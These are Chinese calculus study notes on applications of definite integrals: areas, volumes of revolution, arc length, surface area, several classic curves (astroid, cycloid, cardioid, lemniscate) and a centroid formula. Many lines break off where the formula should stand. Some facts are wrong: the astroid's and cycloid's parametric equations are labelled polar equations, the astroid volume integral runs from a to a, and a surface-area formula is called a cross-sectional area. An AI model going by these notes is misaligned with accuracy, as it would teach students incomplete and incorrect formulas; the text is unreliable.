(1) 若平面域D由曲线$y=f(x),y=g(x)(f(x)\ge g(x)),x=a,x=b(a<b)$所围成,则
(2) 若平面域D由曲线$r=r(\theta),\theta=\alpha,\theta=\beta(\alpha<\beta)$所围成,则面积为
空间体的体积
(1) 旋转体的体积
平面域D绕直线L:ax+by+c=0(该直线不穿过区域D)旋转所得旋转体体积记为V
特别的,若区域D由曲线$y=f(x)(f(x)\ge0$和直线$x=a,x=b(0\le a\le b)$及x轴所围成,则
(1) 区域D绕x轴旋转$(r(x,y)=y)$一周所得旋转体的体积为
(2) 区域D绕y轴旋转$(r(x,y)=x)$一周所得旋转体的体积为
(2) 横截面面积的体积
曲线弧长
(1) 设曲线段C由直角坐标方程$y=f(x)(a\le x\le b)$给出,其中$y(x)$在[a,b]上有一阶连续导数,则该曲线段的弧长为
(2) 设曲线段C由参数方程$\begin{cases}
x=x(t),\\
y=y(t),
\end{cases}(a\le t\le \beta)$给出,其中$x(t),y(t)$在$[\alpha,\beta]$上有一阶连续导数,则该曲线段的弧长为
(3) 设曲线段C由极坐标方程$r=r(\theta)(\alpha\le\theta\beta)$给出,其中$r(\theta)$在$[\alpha,\beta]$上有一阶连续导数,则该曲线段的弧长为
(4) 旋转体侧面积
曲线$y=f(x)(f(x)\ge0)$和直线$x=a,x=b(0\le a\le b)$及x轴所围成区域绕x轴旋转所得旋转体的侧面积是
星形线
直角坐标方程:$x^{\frac{2}{3}}+y^{\frac{2}{3}}=a^{\frac{2}{3}}$
极坐标方程:$x=a\cos^3t,y=a\sin^3t$
围成面积$A=4\int_0^aydx$
弧长$L=4\int_0^a\sqrt{1+y’^2}dx$
绕x轴体积$V=2\pi\int_a^a y^2dx$
旋转体横截面积$2*2\pi\int_0^ay\sqrt{1+y’^2}dx$
摆线
极坐标方程:$x=a(t-\sin t),y=a(1-\cos t)$
心形线
极坐标方程:$r=a(1+\cos\theta)$
双纽线
直角坐标方程:$(x^2+y^2)^2=a^2(x^2-y^2)$
极坐标方程:$r^2=a^2\cos2\theta$
旋转体侧面积:$2\int_0^\frac{\pi}{4}2\pi*r\sin\theta\sqrt{r^2+r’^2(\theta)}d\theta$
质心计算公式$r_\sigma=\frac{\sum_im_ir_i}{M}$和$r_\sigma=\frac{\int^b_ax\rho(x)dx}{\int^b_a\rho(x)dx}$